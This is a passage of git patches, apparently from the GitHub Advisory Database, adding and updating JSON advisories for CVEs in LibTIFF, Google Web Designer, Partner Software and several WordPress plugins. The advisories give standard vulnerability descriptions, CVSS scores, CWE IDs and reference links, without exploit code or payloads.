"CWE-120" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/06/GHSA-vwv7-36jv-h55v/GHSA-vwv7-36jv-h55v.json b/advisories/unreviewed/2025/06/GHSA-vwv7-36jv-h55v/GHSA-vwv7-36jv-h55v.json index 264a8316a17e3..171c6e165f591 100644 --- a/advisories/unreviewed/2025/06/GHSA-vwv7-36jv-h55v/GHSA-vwv7-36jv-h55v.json +++ b/advisories/unreviewed/2025/06/GHSA-vwv7-36jv-h55v/GHSA-vwv7-36jv-h55v.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vwv7-36jv-h55v", - "modified": "2025-06-12T09:30:32Z", + "modified": "2025-08-02T00:31:08Z", "published": "2025-06-12T09:30:32Z", "aliases": [ "CVE-2025-4613" ], "details": "Path traversal in Google Web Designer's template handling versions prior to 16.3.0.0407 on Windows allows attacker to achieve remote code execution by tricking users into downloading a malicious ad template", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:N/R:U/V:D/RE:L/U:X" @@ -26,7 +30,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-20" + "CWE-20", + "CWE-22" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/08/GHSA-p48p-6mxj-w7jx/GHSA-p48p-6mxj-w7jx.json b/advisories/unreviewed/2025/08/GHSA-p48p-6mxj-w7jx/GHSA-p48p-6mxj-w7jx.json new file mode 100644 index 0000000000000..858f25c1a4196 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-p48p-6mxj-w7jx/GHSA-p48p-6mxj-w7jx.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p48p-6mxj-w7jx", + "modified": "2025-08-02T00:31:08Z", + "published": "2025-08-02T00:31:08Z", + "aliases": [ + "CVE-2024-13978" + ], + "details": "A vulnerability was found in LibTIFF up to 4.7.0. It has been declared as problematic. Affected by this vulnerability is the function t2p_read_tiff_init of the file tools/tiff2pdf.c of the component fax2ps. The manipulation leads to null pointer dereference. The attack needs to be approached locally. The complexity of an attack is rather high. The exploitation appears to be difficult. The patch is named 2ebfffb0e8836bfb1cd7d85c059cd285c59761a4. It is recommended to apply a patch to fix this issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13978" + }, + { + "type": "WEB", + "url": "https://gitlab.com/libtiff/libtiff/-/commit/2ebfffb0e8836bfb1cd7d85c059cd285c59761a4" + }, + { + "type": "WEB", + "url": "https://gitlab.com/libtiff/libtiff/-/issues/649" + }, + { + "type": "WEB", + "url": "https://gitlab.com/libtiff/libtiff/-/merge_requests/667" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318355" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318355" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.624562" + }, + { + "type": "WEB", + "url": "http://www.libtiff.org" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T22:15:25Z" + } +} \ No newline at end of file From 037bfb804ba396a01823db4190c8613edd5ff97f Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 2 Aug 2025 03:33:32 +0000 Subject: [PATCH 309/323] Publish Advisories GHSA-pr3f-84fh-7r83 GHSA-x33w-hjv7-gpx7 GHSA-7rxx-x775-hwq2 GHSA-frxx-4wv8-gw23 GHSA-v5qq-h69f-g539 --- .../GHSA-pr3f-84fh-7r83.json | 2 +- .../GHSA-x33w-hjv7-gpx7.json | 2 +- .../GHSA-7rxx-x775-hwq2.json | 29 +++++++++++++++++++ .../GHSA-frxx-4wv8-gw23.json | 29 +++++++++++++++++++ .../GHSA-v5qq-h69f-g539.json | 29 +++++++++++++++++++ 5 files changed, 89 insertions(+), 2 deletions(-) create mode 100644 advisories/unreviewed/2025/08/GHSA-7rxx-x775-hwq2/GHSA-7rxx-x775-hwq2.json create mode 100644 advisories/unreviewed/2025/08/GHSA-frxx-4wv8-gw23/GHSA-frxx-4wv8-gw23.json create mode 100644 advisories/unreviewed/2025/08/GHSA-v5qq-h69f-g539/GHSA-v5qq-h69f-g539.json diff --git a/advisories/unreviewed/2025/07/GHSA-pr3f-84fh-7r83/GHSA-pr3f-84fh-7r83.json b/advisories/unreviewed/2025/07/GHSA-pr3f-84fh-7r83/GHSA-pr3f-84fh-7r83.json index 98ff7cae7d06c..a6f1d21f716b7 100644 --- a/advisories/unreviewed/2025/07/GHSA-pr3f-84fh-7r83/GHSA-pr3f-84fh-7r83.json +++ b/advisories/unreviewed/2025/07/GHSA-pr3f-84fh-7r83/GHSA-pr3f-84fh-7r83.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pr3f-84fh-7r83", - "modified": "2025-07-18T21:30:29Z", + "modified": "2025-08-02T03:31:20Z", "published": "2025-07-18T21:30:29Z", "aliases": [ "CVE-2025-33014" diff --git a/advisories/unreviewed/2025/07/GHSA-x33w-hjv7-gpx7/GHSA-x33w-hjv7-gpx7.json b/advisories/unreviewed/2025/07/GHSA-x33w-hjv7-gpx7/GHSA-x33w-hjv7-gpx7.json index 595842d770384..3a8ecb4a32e6a 100644 --- a/advisories/unreviewed/2025/07/GHSA-x33w-hjv7-gpx7/GHSA-x33w-hjv7-gpx7.json +++ b/advisories/unreviewed/2025/07/GHSA-x33w-hjv7-gpx7/GHSA-x33w-hjv7-gpx7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-x33w-hjv7-gpx7", - "modified": "2025-07-16T12:30:21Z", + "modified": "2025-08-02T03:31:20Z", "published": "2025-07-16T12:30:21Z", "aliases": [ "CVE-2025-6993" diff --git a/advisories/unreviewed/2025/08/GHSA-7rxx-x775-hwq2/GHSA-7rxx-x775-hwq2.json b/advisories/unreviewed/2025/08/GHSA-7rxx-x775-hwq2/GHSA-7rxx-x775-hwq2.json new file mode 100644 index 0000000000000..ed17d5587c181 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-7rxx-x775-hwq2/GHSA-7rxx-x775-hwq2.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7rxx-x775-hwq2", + "modified": "2025-08-02T03:31:21Z", + "published": "2025-08-02T03:31:21Z", + "aliases": [ + "CVE-2025-6077" + ], + "details": "Partner Software's Partner Software Product and corresponding Partner Web application use the same default username and password for the administrator account across all versions.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6077" + }, + { + "type": "WEB", + "url": "https://partnersoftware.com/resources/software-release-info-4-32" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T03:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-frxx-4wv8-gw23/GHSA-frxx-4wv8-gw23.json b/advisories/unreviewed/2025/08/GHSA-frxx-4wv8-gw23/GHSA-frxx-4wv8-gw23.json new file mode 100644 index 0000000000000..791b0898692b2 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-frxx-4wv8-gw23/GHSA-frxx-4wv8-gw23.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-frxx-4wv8-gw23", + "modified": "2025-08-02T03:31:21Z", + "published": "2025-08-02T03:31:20Z", + "aliases": [ + "CVE-2025-6078" + ], + "details": "Partner Software's Partner Software application and Partner Web application allows an authenticated user to add notes on the 'Notes' page when viewing a job but does not completely sanitize input, making it possible to add notes with HTML tags and JavaScript, enabling an attacker to add a note containing malicious JavaScript, leading to stored XSS (cross-site scripting).", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6078" + }, + { + "type": "WEB", + "url": "https://partnersoftware.com/resources/software-release-info-4-32" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T03:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-v5qq-h69f-g539/GHSA-v5qq-h69f-g539.json b/advisories/unreviewed/2025/08/GHSA-v5qq-h69f-g539/GHSA-v5qq-h69f-g539.json new file mode 100644 index 0000000000000..c0f6f1b5184ae --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-v5qq-h69f-g539/GHSA-v5qq-h69f-g539.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v5qq-h69f-g539", + "modified": "2025-08-02T03:31:21Z", + "published": "2025-08-02T03:31:21Z", + "aliases": [ + "CVE-2025-6076" + ], + "details": "Partner Software's Partner Software application and Partner Web application do not sanitize files uploaded on the \"reports\" tab, allowing an authenticated attacker to upload a malicious file and compromise the device. By default, the software runs as SYSTEM, heightening the severity of the vulnerability.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6076" + }, + { + "type": "WEB", + "url": "https://partnersoftware.com/resources/software-release-info-4-32" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T03:15:23Z" + } +} \ No newline at end of file From ce112eba25cc56ae05714f46a82492d9eac0fdf0 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 2 Aug 2025 06:33:06 +0000 Subject: [PATCH 310/323] Publish Advisories GHSA-7rpq-f876-wqqx GHSA-q3r7-8xrw-r6rw --- .../GHSA-7rpq-f876-wqqx.json | 44 +++++++++++++++++++ .../GHSA-q3r7-8xrw-r6rw.json | 44 +++++++++++++++++++ 2 files changed, 88 insertions(+) create mode 100644 advisories/unreviewed/2025/08/GHSA-7rpq-f876-wqqx/GHSA-7rpq-f876-wqqx.json create mode 100644 advisories/unreviewed/2025/08/GHSA-q3r7-8xrw-r6rw/GHSA-q3r7-8xrw-r6rw.json diff --git a/advisories/unreviewed/2025/08/GHSA-7rpq-f876-wqqx/GHSA-7rpq-f876-wqqx.json b/advisories/unreviewed/2025/08/GHSA-7rpq-f876-wqqx/GHSA-7rpq-f876-wqqx.json new file mode 100644 index 0000000000000..e8a2cdca78466 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-7rpq-f876-wqqx/GHSA-7rpq-f876-wqqx.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7rpq-f876-wqqx", + "modified": "2025-08-02T06:31:28Z", + "published": "2025-08-02T06:31:27Z", + "aliases": [ + "CVE-2025-7694" + ], + "details": "The Woffice Core plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the woffice_file_manager_delete() function in all versions up to, and including, 5.4.26. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7694" + }, + { + "type": "WEB", + "url": "https://hub.woffice.io/woffice/changelog" + }, + { + "type": "WEB", + "url": "https://themeforest.net/item/woffice-intranetextranet-wordpress-theme/11671924" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/41a362cf-e27e-436a-85f1-7c48e2e098eb?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T04:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-q3r7-8xrw-r6rw/GHSA-q3r7-8xrw-r6rw.json b/advisories/unreviewed/2025/08/GHSA-q3r7-8xrw-r6rw/GHSA-q3r7-8xrw-r6rw.json new file mode 100644 index 0000000000000..c299337524a47 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-q3r7-8xrw-r6rw/GHSA-q3r7-8xrw-r6rw.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q3r7-8xrw-r6rw", + "modified": "2025-08-02T06:31:28Z", + "published": "2025-08-02T06:31:28Z", + "aliases": [ + "CVE-2025-8146" + ], + "details": "The Qi Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's TypeOut Text widget in all versions up to, and including, 1.9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8146" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3335762" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/qi-addons-for-elementor/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4fdfdcbe-014b-4b68-9ac5-976d384106c3?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T05:15:23Z" + } +} \ No newline at end of file From 2c244b0c4d3a4c0061fc2efe66b070b4d34f7736 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 2 Aug 2025 09:31:58 +0000 Subject: [PATCH 311/323] Publish Advisories GHSA-27rp-rjv6-3rv3 GHSA-3cq9-x9vj-w2qm GHSA-7m46-h3mf-3mgv GHSA-86r7-7qgg-4qfx GHSA-f98w-r93j-6c74 GHSA-gwpj-fpf2-w7c7 GHSA-rj4m-vmxx-xx9r GHSA-v6g9-v26j-6w22 GHSA-vrcj-8r35-5gqx GHSA-wqwr-pr9c-fc8f GHSA-wxh5-h8r6-4qxv --- .../GHSA-27rp-rjv6-3rv3.json | 40 +++++++++++++ .../GHSA-3cq9-x9vj-w2qm.json | 44 +++++++++++++++ .../GHSA-7m46-h3mf-3mgv.json | 44 +++++++++++++++ .../GHSA-86r7-7qgg-4qfx.json | 56 +++++++++++++++++++ .../GHSA-f98w-r93j-6c74.json | 40 +++++++++++++ .../GHSA-gwpj-fpf2-w7c7.json | 40 +++++++++++++ .../GHSA-rj4m-vmxx-xx9r.json | 56 +++++++++++++++++++ .../GHSA-v6g9-v26j-6w22.json | 44 +++++++++++++++ .../GHSA-vrcj-8r35-5gqx.json | 48 ++++++++++++++++ .../GHSA-wqwr-pr9c-fc8f.json | 44 +++++++++++++++ .../GHSA-wxh5-h8r6-4qxv.json | 44 +++++++++++++++ 11 files changed, 500 insertions(+) create mode 100644 advisories/unreviewed/2025/08/GHSA-27rp-rjv6-3rv3/GHSA-27rp-rjv6-3rv3.json create mode 100644 advisories/unreviewed/2025/08/GHSA-3cq9-x9vj-w2qm/GHSA-3cq9-x9vj-w2qm.json create mode 100644 advisories/unreviewed/2025/08/GHSA-7m46-h3mf-3mgv/GHSA-7m46-h3mf-3mgv.json create mode 100644 advisories/unreviewed/2025/08/GHSA-86r7-7qgg-4qfx/GHSA-86r7-7qgg-4qfx.json create mode 100644 advisories/unreviewed/2025/08/GHSA-f98w-r93j-6c74/GHSA-f98w-r93j-6c74.json create mode 100644 advisories/unreviewed/2025/08/GHSA-gwpj-fpf2-w7c7/GHSA-gwpj-fpf2-w7c7.json create mode 100644 advisories/unreviewed/2025/08/GHSA-rj4m-vmxx-xx9r/GHSA-rj4m-vmxx-xx9r.json create mode 100644 advisories/unreviewed/2025/08/GHSA-v6g9-v26j-6w22/GHSA-v6g9-v26j-6w22.json create mode 100644 advisories/unreviewed/2025/08/GHSA-vrcj-8r35-5gqx/GHSA-vrcj-8r35-5gqx.json create mode 100644 advisories/unreviewed/2025/08/GHSA-wqwr-pr9c-fc8f/GHSA-wqwr-pr9c-fc8f.json create mode 100644 advisories/unreviewed/2025/08/GHSA-wxh5-h8r6-4qxv/GHSA-wxh5-h8r6-4qxv.json diff --git a/advisories/unreviewed/2025/08/GHSA-27rp-rjv6-3rv3/GHSA-27rp-rjv6-3rv3.json b/advisories/unreviewed/2025/08/GHSA-27rp-rjv6-3rv3/GHSA-27rp-rjv6-3rv3.json new file mode 100644 index 0000000000000..a58ce79b11996 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-27rp-rjv6-3rv3/GHSA-27rp-rjv6-3rv3.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-27rp-rjv6-3rv3", + "modified": "2025-08-02T09:30:19Z", + "published": "2025-08-02T09:30:19Z", + "aliases": [ + "CVE-2025-4588" + ], + "details": "The 360 Photo Spheres plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sphere' shortcode in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4588" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/360-sphere-images" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a654ee62-8742-49bc-95fd-bfab14750b50?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T08:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-3cq9-x9vj-w2qm/GHSA-3cq9-x9vj-w2qm.json b/advisories/unreviewed/2025/08/GHSA-3cq9-x9vj-w2qm/GHSA-3cq9-x9vj-w2qm.json new file mode 100644 index 0000000000000..33cc855232307 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-3cq9-x9vj-w2qm/GHSA-3cq9-x9vj-w2qm.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3cq9-x9vj-w2qm", + "modified": "2025-08-02T09:30:20Z", + "published": "2025-08-02T09:30:20Z", + "aliases": [ + "CVE-2025-8399" + ], + "details": "The Mmm Unity Loader plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘attributes’ parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8399" + }, + { + "type": "WEB", + "url": "https://plugins.svn.wordpress.org/mmm-unity-loader/trunk/mmm-unity-loader.php" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/mmm-unity-loader/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2cee1d75-278c-45c6-915d-60aae6a4d3a2?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T09:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-7m46-h3mf-3mgv/GHSA-7m46-h3mf-3mgv.json b/advisories/unreviewed/2025/08/GHSA-7m46-h3mf-3mgv/GHSA-7m46-h3mf-3mgv.json new file mode 100644 index 0000000000000..a49b51567a49e --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-7m46-h3mf-3mgv/GHSA-7m46-h3mf-3mgv.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7m46-h3mf-3mgv", + "modified": "2025-08-02T09:30:20Z", + "published": "2025-08-02T09:30:20Z", + "aliases": [ + "CVE-2025-8391" + ], + "details": "The Magic Edge – Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘height’ parameter in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8391" + }, + { + "type": "WEB", + "url": "https://plugins.svn.wordpress.org/magic-edge-lite-image-background-remover/tags/1.1.6/MagicEdgeFrontend.php" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/magic-edge-lite-image-background-remover/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fe456de4-4bf3-45aa-938d-8d4561fac44e?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T09:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-86r7-7qgg-4qfx/GHSA-86r7-7qgg-4qfx.json b/advisories/unreviewed/2025/08/GHSA-86r7-7qgg-4qfx/GHSA-86r7-7qgg-4qfx.json new file mode 100644 index 0000000000000..f62f1c40c1273 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-86r7-7qgg-4qfx/GHSA-86r7-7qgg-4qfx.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-86r7-7qgg-4qfx", + "modified": "2025-08-02T09:30:19Z", + "published": "2025-08-02T09:30:19Z", + "aliases": [ + "CVE-2025-6754" + ], + "details": "The SEO Metrics plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization checks in both the seo_metrics_handle_connect_button_click() AJAX handler and the seo_metrics_handle_custom_endpoint() function in versions 1.0.5 through 1.0.15. Because the AJAX action only verifies a nonce, without checking the caller’s capabilities, a subscriber-level user can retrieve the token and then access the custom endpoint to obtain full administrator cookies.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6754" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/seo-metrics-helper/trunk/common-functions.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/seo-metrics-helper/trunk/endpoint.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/seo-metrics-helper/trunk/seo-metrics.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/seo-metrics-helper/trunk/welcome-page.php" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/seo-metrics-helper/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/48658b33-ae53-4919-8180-1188f72553f7?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T08:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-f98w-r93j-6c74/GHSA-f98w-r93j-6c74.json b/advisories/unreviewed/2025/08/GHSA-f98w-r93j-6c74/GHSA-f98w-r93j-6c74.json new file mode 100644 index 0000000000000..92905ac9b3713 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-f98w-r93j-6c74/GHSA-f98w-r93j-6c74.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f98w-r93j-6c74", + "modified": "2025-08-02T09:30:20Z", + "published": "2025-08-02T09:30:20Z", + "aliases": [ + "CVE-2025-6832" + ], + "details": "The All in One Time Clock Lite – Tracking Employee Time Has Never Been Easier plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'nonce' parameter in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6832" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3336943%40aio-time-clock-lite&new=3336943%40aio-time-clock-lite&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/844b7471-3adf-45fd-9906-f0c817d6565c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T09:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-gwpj-fpf2-w7c7/GHSA-gwpj-fpf2-w7c7.json b/advisories/unreviewed/2025/08/GHSA-gwpj-fpf2-w7c7/GHSA-gwpj-fpf2-w7c7.json new file mode 100644 index 0000000000000..ae70168afd80d --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-gwpj-fpf2-w7c7/GHSA-gwpj-fpf2-w7c7.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gwpj-fpf2-w7c7", + "modified": "2025-08-02T09:30:20Z", + "published": "2025-08-02T09:30:20Z", + "aliases": [ + "CVE-2025-8212" + ], + "details": "The Medical Addon for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Typewriter widget in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8212" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/medical-addon-for-elementor/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9dc5452d-41e4-4b28-bb89-fe5ef9c10cb7?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T08:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-rj4m-vmxx-xx9r/GHSA-rj4m-vmxx-xx9r.json b/advisories/unreviewed/2025/08/GHSA-rj4m-vmxx-xx9r/GHSA-rj4m-vmxx-xx9r.json new file mode 100644 index 0000000000000..a9a5f0f6a36aa --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-rj4m-vmxx-xx9r/GHSA-rj4m-vmxx-xx9r.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rj4m-vmxx-xx9r", + "modified": "2025-08-02T09:30:20Z", + "published": "2025-08-02T09:30:20Z", + "aliases": [ + "CVE-2025-8466" + ], + "details": "A vulnerability was found in code-projects Online Farm System 1.0. It has been classified as critical. Affected is an unknown function of the file /forgot_passfarmer.php. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": 